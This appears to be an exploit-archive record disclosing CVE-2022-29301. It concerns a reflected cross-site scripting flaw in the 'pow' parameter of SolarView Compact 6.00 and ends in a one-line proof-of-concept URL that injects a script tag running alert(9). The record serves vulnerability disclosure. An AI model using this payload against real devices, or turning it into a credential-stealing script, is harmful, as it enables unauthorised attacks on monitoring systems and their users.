id: 37799
date: 06/14/2022
title: SolarView Compact 6.00 - (pow) Cross-Site Scripting Vulnerability
author: Ahmed Alroky
cves: CVE-2022-29301

# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29301
# Tested on: Windows

# Proof Of Concept:
http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green

#  0day.today [2023-03-23]  #